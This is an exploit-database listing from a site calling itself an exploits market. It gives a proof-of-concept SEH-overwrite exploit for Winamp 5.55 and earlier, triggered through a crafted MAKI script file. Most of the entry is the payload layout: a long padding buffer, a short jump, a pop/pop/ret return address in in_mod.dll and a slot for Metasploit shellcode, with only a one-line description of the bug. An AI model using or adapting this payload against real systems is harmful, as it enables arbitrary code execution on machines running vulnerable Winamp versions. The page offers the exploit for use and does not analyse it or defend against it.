[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Winamp <= 5.55 (MAKI script) Universal Seh Overwrite PoC

Author
His0k4
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6871
Category
dos / poc
Date add
21-05-2009
Platform
unsorted
========================================================
Winamp <= 5.55 (MAKI script) Universal Seh Overwrite PoC
========================================================


[x] Bug: Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit
[x] Exploited By His0k4

[x] Description: The vulnerabilty is due when parsing a maki script file exactly in the "getRuntimeVersion"
                 and we can overwrite the seh easily :)
				 
The exploit schema looks like this:
payload = "\x41"*16756
payload += "\x74\x06\x90\x90"
payload += "\x32\x55\xF0\x12" # universal p/p/r in_mod.dll
payload += shellcode # calc shellcode from metasploit




#  0day.today [2024-12-23]  #